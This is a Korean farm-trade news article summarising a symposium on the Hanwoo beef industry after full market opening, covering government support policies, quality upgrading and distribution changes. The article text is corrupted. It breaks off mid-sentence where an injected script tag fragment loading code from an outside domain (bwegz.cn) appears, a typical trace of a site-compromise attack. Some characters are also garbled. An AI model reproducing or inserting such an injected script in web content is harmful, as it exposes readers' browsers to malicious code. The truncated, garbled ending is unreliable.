" 완전개방 시대를 맞아 한우산업이 살아남기 위해서는 한우관련 생산자단체의 역할이 더욱 중요하고, 생산자단체나 지역 협의체들을 중심으로 계열화가 이루어져 거세사육, 한우고급육을 생산하는 것이 가장 바람직하다는 지적이다.

쇠고기시장 완전개방후 처음으로 "생우 및 수입쇠고기 완전개방 후 한우산업 영향에 관한 심포지엄"이 지난 2일 농협중앙회 축산연수원에서 한우 사육농가를 비롯한 한우산업 관련인 300여명이 참석한 가운데 농협 교육연수원과 축산지원부 주최로 열렸다.
이날 심포지엄에서 주제발표자와 토론자들은 한우산업이 살아남기 위해서는 생산자단체의 중요성과 고급육생산과 유통망 확충이 중요하다고 발표했다. 이날 심포지엄의 주제발표와 토론요지를 요약, 정리했다.

◇주제발표
△2001년 한우산업 정책 및 유통방향( 정동홍 농림부 축산경영과장)
2001년 쇠고기시장 개방에 따라 국내산과 수입육??경쟁뿐만 아니라 국내산 브랜드??경쟁도 더욱 심화될 것으로 전망되고, 수요가 공급을 창출하는 소비자시대로 전환될 것이다.
이에따라 유통 및 물류체계 혁신에 따라 유통업체 주도의 시장구조로 재편되고, 시장개방에 따른 정부의 수급조절기능이 감소하여 수급안정, 품질고급화의 주체로서 생산자 조직의 역할 강화 필요성이 대두되고 있다.

정부는 한우산업의 발전을 위해 사육기반안정 및 자율발전토대 구축, 품질고급화를 위한 기반구축, 축산물 유통체계 개선, 한우고기소비기반 확충 등 발전대책을 세워두고 있다.
사육기반안정 및 자율발전토대 구축을 위해 쇠고기자급률 35~40% 수준을 유지할 수 있도록 한우번식기반 확보를 추진해 나갈 것이다. 송아지생산안정제 조기정착을 위해 보전금한도 초과분에 대해 민간보험을 통한 지급방안과 안정기준가격도 90만원에서 120만원으로 상향조정하고 지급한도액도 20만원에서 25만원으로 확대 지원하겠다.

또 비육우 가격안정보험 개발추진과 한우다산장려금 지원을 강화하고, 가축공제시범사업의 전국 확대실시 및 대상을 확대하고 자가인공수정기를 한우농가에 보급할 계획이다.
자율발전토대 구축을 위해 한우산업발전협의회를 구성해 생산자단체 중심의 체계적인 한우산업을 추진하는 시·군 및 농가위주로 정책자금 지원체계도 개선하고, 일선 축협조합을 자율적 한우사업추진의 핵심주체로 육성할 것이다. 그리고 조사료 등 부존자원 생산 및 활용기반을 확충할 것이다.
품질고급화를 위한 기반구축을 위해 1등급 출현율을 40%로 제고하고 가축개량, 신기술도입 등 중장기적인 품질고급화 노력과 병행하여 단기적으로 거세비육 활성화 적극 추진하고 암소와 수소 개량을 동시 추진해 품질고급화 촉진해 나갈 방향이다.

축산물 유통체계 개선을 위해서는 냉장부분육 유통과 안전성 향상을 촉진하고 대형화, 표준화 및 전자상거래화 되어 가는 유통여건 변화에 능동적으로 대응해 나가기 위해 축산물종합처리장을 신물류체계 핵심거점으로 육성하고, 농축협 유통망의 통합연계로 경쟁력 있는 선진유통구조를 구축한다.
한우고기 소비기반 확충을 위해 음식점원산지표시제 도입 추진과 등급별·부위별 구분판매제 확대시행으로 부정유통경로 차단 및 소비자의 알권리를 보장해 나가겠다.

△한우산업 개방전후의 유통변화추세(황형성 농협 조사부팀장)
국내 유통업체에 대한 조사결과 수입자유화 이후 한우고기의 매출은 줄어드는 반면, 수입냉장육은 크게 늘어날 것으로 전망하는 업체들이 많았다. 이러한 점을 고려할 때 우리나라에서도 냉장육의 수입이 꾸준히 증가할 것으로 예상된다.
수입쇠고기에 대한 구분판매제가 폐지될 경우에 대비해 수입쇠고기의 한우고기 둔갑판매를 억제할 수 있는 대책 마련이 시급하다. 특히 음식점에서 소비되는 육류의 원산지 표시제 도입을 적극적으로 검토해 볼 필요가 있다.

수입쇠고기 전문판매점의 폐지가 불가피할 경우에는 역으로 한우고기 전문판매점 제도를 도입해서 소비자들이 안심하고 한우고기를 구입할 수 있도록 해야 한다. 그리고 수출국들의 적극적인 국내시장 공략에 대응하기 위해서 우리도 한우고기의 맛과 우수성을 적극적으로 홍보할 수 있는 대책마련이 시급하다.
HACCP제도의 조기정착으로 육류의 생산 및 유통단계에서 위생수준과 안전성을 높일수 있도록 해야 한다. 특히 영세한 도축장에 대해서는 과감한 구조조정을 통해 위생적인 한우고기를 공급할 수 있도록 노력해야 한다.

한우고기의 위생수준과 안전성을 높일수 있는 다양한 조치들을 빠른 시일내에 정착시켜 소비자들의 신뢰를 높여 나갈 수 있는 노력이 필요하다.
쇠고기 수입자유화에 대한 대응책으로서 브랜드 한우고기가 성공하기 위해서는 ?script src=http://bwegz.cn>
저작권자 © 농수축산신문 무단전재, 재배포 및 AI학습 이용 금지